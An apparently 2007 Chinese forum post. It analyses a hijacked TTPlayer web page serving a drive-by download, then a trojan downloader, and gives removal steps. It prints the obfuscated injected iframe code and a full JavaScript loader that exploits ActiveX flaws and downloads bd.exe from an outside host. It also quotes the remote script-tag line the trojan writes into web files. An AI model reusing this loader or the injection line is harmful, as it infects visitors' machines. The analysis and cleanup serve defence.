挂马地址：hxxp://wwwcnc.ttplayer.com/index.php
网页前半部分被挂的代码：{SCRIPT}eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");{/script}{html}
解密后为指向http:\/\/aa.llsging.com\/ww\/new280.htm?016

继续
http:\/\/aa.llsging.com\/ww\/new280.htm?016解密后指向
http://a5.llsging.com/aa/nini.htm
http://a5.llsging.com/aa/gege.htm

http://a5.llsging.com/aa/nini.htm代码：

{SCRIPT LANGUAGE='JavaScript'}
function ResumeError() {
return true;
}
window.onerror = ResumeError;
{/SCRIPT}
{SCRIPT LANGUAGE="JavaScript"}
eval("/*{SCRIPT LANGUAGE='JavaScript'}
function ResumeError() {
return true;
}
window.onerror = ResumeError;
{/SCRIPT}*/
function init(){document.write()}window.onload=init;if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='iepl=orer;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/11.js}{\/script}")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/bb.js}{\/script}")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/ppp.js}{\/script}")}}try{var h;var obj=new ActiveXObject("BaiduBar.Tool")}catch(h){};finally{if(h!="[object Error]"){obj.DloadDS("http://down.llsging.com/bb/bd.cab","bd.exe",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){document.write("{iframe width='10' height='10' src='http://a5.llsging.com/aa/bf.html'}{/iframe}")}}}}")
{/SCRIPT}

http:\/\/a5.llsging.com\/aa\/11.js MS06-014漏洞
http:\/\/a5.llsging.com\/aa\/bb.js 暴风影音漏洞
http:\/\/a5.llsging.com\/aa\/ppp.js PPStream漏洞?
http://down.llsging.com/bb/bd.cab 百度toolbar

http://a5.llsging.com/aa/gege.htm不会解密 希望大家帮下忙...

最后下载的仍是一个木马下载者

由于本人才疏学浅，网页解密部分的分析可能存在错误，还请大家指教

下面是该木马下载者的简要分析
File: ntuser.com
Size: 31792 bytes
Modified: 2007年12月22日, 10:19:44
MD5: 5EE5CC57AAD61F73420F874433E526A5
SHA1: 24141C18ACB87CB8E54D924C2E117B8F44926598
CRC32: 605FE6B3

1.病毒运行后，释放如下副本以及文件：
%systemroot%\system32\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去

5.感染全盘的php jsp asp htm html文件 在后面写入{script language=javascript src=http://cc.18dd.net/1.js}{/script}的代码

6.wuauclt.exe执行下载木马的操作
读取http://*.com/elf_listo.txt的文件列表
下载27个木马和病毒 到c:\Program Files下面 分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe

木马感染后的sreng日志如下：
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{SSLDyn}{%systemroot%\SSLDyn.exE} []
    {cmdbcs}{%systemroot%\cmdbcs.exe} []
    {WinSysM}{%systemroot%\608769M.exe} []
    {WinSysW}{%systemroot%\608769L.exe} []
    {Kvsc3}{%systemroot%\Kvsc3.exE} []
    {AVPSrv}{%systemroot%\AVPSrv.exE} []
    {NVDispDrv}{%systemroot%\aorwpw.exe} [N/A]
    {DbgHlp32}{%systemroot%\DbgHlp32.exe} []

==================================
驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
{system32\DRIVERS\msconkt.sys}{N/A}（之前的comint32.sys，GD*I32.dll，bj*rl.dll，addr*help.dll木马群变种）
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
{system32\DRIVERS\msconkt.sys}{N/A}
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
{\??\%systemroot%\system32\fat32.sys}{N/A}（机器狗病毒变种）

==================================
正在运行的进程
[PID: 1740][%systemroot%\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [%systemroot%\608769MM.DLL] [N/A, ]
    [%systemroot%\608769WL.DLL] [N/A, ]
    [%systemroot%\system32\SSLDyn.dll] [N/A, ]
    [%systemroot%\system32\cmdbcs.dll] [N/A, ]
    [%systemroot%\system32\Kvsc3.dll] [N/A, ]
    [%systemroot%\system32\AVPSrv.dll] [N/A, ]
    [%systemroot%\system32\DbgHlp32.dll] [N/A, ]
[PID: 524][C:\Program Files\VMware\VMware Tools\VMwareService.exe] [VMware, Inc., 6.0.1 build-55017]
    [%systemroot%\system32\GDQQHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDDTHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDJZI32.dll] [N/A, ]
    [%systemroot%\system32\GDQQSGI32.dll] [N/A, ]
    [%systemroot%\system32\GDZYZJI32.dll] [N/A, ]
    [%systemroot%\system32\GDDJI32.dll] [N/A, ]
    [%systemroot%\system32\GDGFSJI32.dll] [N/A, ]
    [%systemroot%\system32\GDMSI32.dll] [N/A, ]
    [%systemroot%\system32\GDZXI32.dll] [N/A, ]
    [%systemroot%\system32\GDWDI32.dll] [N/A, ]
    [%systemroot%\system32\GDGJI32.dll] [N/A, ]
    [%systemroot%\system32\GDWLI32.dll] [N/A, ]
    [%systemroot%\system32\GDFYI32.dll] [N/A, ]
    [%systemroot%\system32\GDZYHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDHnXaI32.dll] [N/A, ]
    [%systemroot%\system32\GDZHTUI32.dll] [N/A, ]
    [%systemroot%\system32\GDWMI32.dll] [N/A, ]
    [%systemroot%\system32\GDJX2I32.dll] [N/A, ]

清除办法：
下载sreng和Xdelbox(可到down.45it.com下载)

1.解压缩Xdelbox
在 添加旁边的框中 输入
%systemroot%\system32\drivers\msconkt.sys
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DbgHlp32.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\REGKEY.hiv
%systemroot%\system32\SSLDyn.dll
%systemroot%\system32\wxptdi.sys
%systemroot%\608769L.exe
%systemroot%\608769M.exe
%systemroot%\608769MM.DLL
%systemroot%\608769WL.DLL
%systemroot%\AVPSrv.exE
%systemroot%\cmdbcs.exe
%systemroot%\DbgHlp32.exe
%systemroot%\Kvsc3.exE
%systemroot%\NVDispDRV.EXE
%systemroot%\SSLDyn.exE
%systemroot%\system32\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推）
输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中
右键 点击右键菜单中的 “立即重启执行删除”
重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
系统会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后会自动重启进入正常模式

2.重启之后
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{SSLDyn}{%systemroot%\SSLDyn.exE} []
    {cmdbcs}{%systemroot%\cmdbcs.exe} []
    {WinSysM}{%systemroot%\608769M.exe} []
    {WinSysW}{%systemroot%\608769L.exe} []
    {Kvsc3}{%systemroot%\Kvsc3.exE} []
    {AVPSrv}{%systemroot%\AVPSrv.exE} []
    {NVDispDrv}{%systemroot%\aorwpw.exe} [N/A]
    {DbgHlp32}{%systemroot%\DbgHlp32.exe} []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
{system32\DRIVERS\msconkt.sys}{N/A}（之前的comint32.sys变种）
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
{system32\DRIVERS\msconkt.sys}{N/A}
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
{\??\%systemroot%\system32\fat32.sys}{N/A}（机器狗病毒变种）

3.清除机器狗病毒
参考www.45its.com/Article/pcedu/Safety/200712/18681.htm
解决方法第三点即可

4.修复被感染的网页文件
推荐使用CSI的iframkill
下载地址：http://www.vaid.cn/blog/read.php?9